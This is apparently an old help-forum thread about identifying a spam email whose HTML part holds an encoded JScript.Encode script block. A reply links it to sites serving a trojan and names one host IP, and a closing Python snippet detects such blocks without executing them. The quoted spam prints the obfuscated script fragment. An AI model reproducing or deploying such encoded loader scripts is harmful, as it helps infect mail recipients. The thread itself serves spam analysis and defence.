
What does this email text mean?


AlphaCentauri


I received an email today with a spammy subject heading and encoded text. It resembles hexadecimal, but isn't when you really look at it (e.g., strings like "C1C").

It seems too short to be a virus, but with the JavaScript terms, it could be referring to executable code on a website somewhere. I have been receiving some infected emails from Kuwait lately (with more obvious virus base64 code), so I figure the gibberish could be Arabic characters. So is it spam to report or a virus to not report?

X-POP3-Rcpt: me[at]mydomain.com
Received: from CPE0080c6fe2156-CM024430000310.cpe.net.cable.rogers.com (CPE0080c6fe2156-CM024430000310.cpe.net.cable.rogers.com [24.100.12.166])
  by host2.capital-computers.com (8.12.10/8.12.10) with SMTP id i89NYjox011863;
  Thu, 9 Sep 2004 19:34:56 -0400
Received: from .clickfish.com ([236.170.218.88]) by 24.100.12.166 with ESMTP;
  Fri, 10 Sep 2004 00:26:32 +0100
Message-ID: <764996u210v8473b93l3697g6b3466[at]clickfish.com>
X-Mailer: Microsoft Office Outlook, Build 11.0.5510
Date: Thu, 09 Sep 2004 20:24:32 -0300
From: "Lucio Gipson" <Gamblethrb[at]clickfish.com>
Reply-To: "Lucio Gipson" <Gamblethrb[at]clickfish.com>
To: nonexistantperson[at]mydomain.com, me[at]mydomain.com,
  info[at]mydomain.com, webmaster[at]mydomain.com
Subject: re:appointment thursday at 01-00 - Thu, 09 Sep 2004 19:27:32 -0400
Organization: Microsoft Office Outlook, Build 11.0.5510
Mime-Version: 1.0
Content-Type: multipart/alternative;
  boundary="6-122353897-0350581327=:13108"

--6-122353897-0350581327=:13108
Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

--6-122353897-0350581327=:13108
Content-Type: text/html; charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
yo babe
what's up?
loved having fun with youm it was so funy. thailand is so great,
anyway, see you soon.
jeff

<script language=3D"JScript.Encode">#[at]~^ngAAAA=3D=3D~[at]#[at]&[Km!:+ YcADbYn`E[at]=
!(o"bHA~?"Z'r4OYa)Jz+!q 8 GR FFv&sbx3 4D:sJ, &fP_'Wc!,CA(M_KxcW!~o"bHA$r"=
f2"xTPUZ"rJS(HV'ExKEPkYzs=7F'J[rkwslHl WU=7Fir[at]*[at]!Jqw]bt2[at]*B*i[at]#[at]&iioAAA=3D=
=3D^#~[at]</script>

THIS IS AN AUTO-GENERATED MESSAGE - PLEASE DO NOT REPLY TO THIS MESSAGE<BR>Login Name: bzpwsun<BR>Password: hwacfby10589s<BR><BR>- Home directory: The location of the home directory varies by platform.<BR>Windows 98 (single-user): C:\Windows<BR>Windows 98 (multi-user): C:\Windows\Profiles<BR>Windows 2000/XP: C:\Documents and Settings<BR><BR><BR><BR><BR> -----BEGIN BLOCK-----

<DIV>Chauncey Michaud<BR>Sexton <BR>Advanced Bio-Medical Electronics, Inc., Slidell, 70458, United States of America<BR>========================================================================<BR> Pat H. Goad Warren County Circuit Clerk Warren County Justice Center Center Street- Suite Bowling Green KY Warren <BR>Phone: 197-144-7176 <BR>Mobile: 959-191-1385 <BR>Email: <A href="mailto:Delaneyvabeh[at]fiberia.com">Delaneyvabeh[at]fiberia.com</A><BR>========================================================================</DIV>

--6-122353897-0350581327=:13108--


First of all, please provide the Tracking URL instead of posting the spam here directly.

Second, if you want to get involved with some folks tracking this stuff down, fire up your newsreader, set server to news://news.spamcop.net/spamcop.geeks .. look for threads with Subject lines containing Jscript Encode/Decode .... Basically, what they are saying is that the code in this spam points to one or more sites that have more code embedded in them. There has been some success in getting the ISP involved to kill the web-based URL/code stuff ... but then again, today's traffic seems to suggest that one site thought to be brought down has re-surfaced with different code .... and per one poster's query, my check appears to agree that he has been blocked from accessing that site .... so "we" may be dealing with a spammer / trojan writer that also reads the SpamCop newsgroups .....

For example, here's a snippet with an included Tracking URL so you can get a hint of the discussion ..... (and compare the spam content/structure)

> http://www.spamcop.net/sc?id=z650744697z56...aa34e54e60e818z

Interesting: same site as last one, 201.12.78.176. Oddly enough the site has been armed again. Now with an 18 kb variant of ss.exe instead of the 15 kb variant found there previously. Also, the file link.html has been repaired. Now it points to link.php at 201.12.78.176 instead of the other location in bezeqint.net space.

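As an added example (not code from the thread or from SpamCop), here is a Python check for the kind of message quoted in the first post and discussed in the reply: it parses the MIME structure, decodes the quoted-printable HTML part, and flags a `JScript.Encode` script block by its `#@~^ ... ==^#~@` envelope. The sample message is constructed, modelled on the headers shown above (not the original bytes), and the raw-bytes check shows why a grep over the undecoded message misses the `=3D`-escaped tag and soft-wrapped lines.

```python
import base64
import email
import re
import struct
from email import policy

# Constructed sample modelled on the spam in this thread (not the original bytes).
# The HTML part is quoted-printable: '=' is escaped as =3D and long lines are
# soft-wrapped with a trailing '=', which hides the tag from a raw-text search.
RAW = b"""From: "Lucio Gipson" <Gamblethrb@clickfish.com>
To: me@mydomain.com
Subject: re:appointment thursday at 01-00
MIME-Version: 1.0
Content-Type: multipart/alternative; boundary="6-122353897-0350581327=:13108"

--6-122353897-0350581327=:13108
Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

yo babe, what's up?
--6-122353897-0350581327=:13108
Content-Type: text/html; charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

<script language=3D"JScript.Encode">#@~^ngAAAA=3D=3D~@#@&[Km!:+ YcADbYn`E@=
!(o"bHA~?"Z'r4OYa)Jz+!q=7F'J[rkwslHliioAAA=3D=
=3D^#~@</script>
--6-122353897-0350581327=:13108--
"""

SCRIPT_TAG = re.compile(r'<script[^>]*JScript\.Encode[^>]*>(.*?)</script>', re.I | re.S)
# Windows Script Encoder envelope: '#@~^' + base64 length + '==' + data + base64 checksum + '==^#~@'
ENVELOPE = re.compile(r'#@~\^([A-Za-z0-9+/]{6})==(.*?)([A-Za-z0-9+/]{6})==\^#~@', re.S)


def naive_tag_present(raw: bytes) -> bool:
    """What a grep over the undecoded message sees: the '=' is still =3D."""
    return b'language="JScript.Encode"' in raw


def find_encoded_scripts(raw: bytes) -> list:
    """Decode each text part and report JScript.Encode blocks with their envelope fields."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    hits = []
    for part in msg.walk():
        if part.get_content_maintype() != 'text':
            continue
        body = part.get_content()  # undoes quoted-printable and applies the charset
        for tag in SCRIPT_TAG.finditer(body):
            env = ENVELOPE.search(tag.group(1))
            hit = {'part': part.get_content_type(), 'envelope': env is not None}
            if env:
                # length field: plaintext byte count as a little-endian DWORD, base64-encoded
                hit['declared_len'] = struct.unpack('<I', base64.b64decode(env.group(1) + '=='))[0]
                hit['payload'] = env.group(2)
            hits.append(hit)
    return hits
```

The hit records which MIME part carried the block and the length the encoder declared, which is enough to route the message to a sandbox or report it without executing anything.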
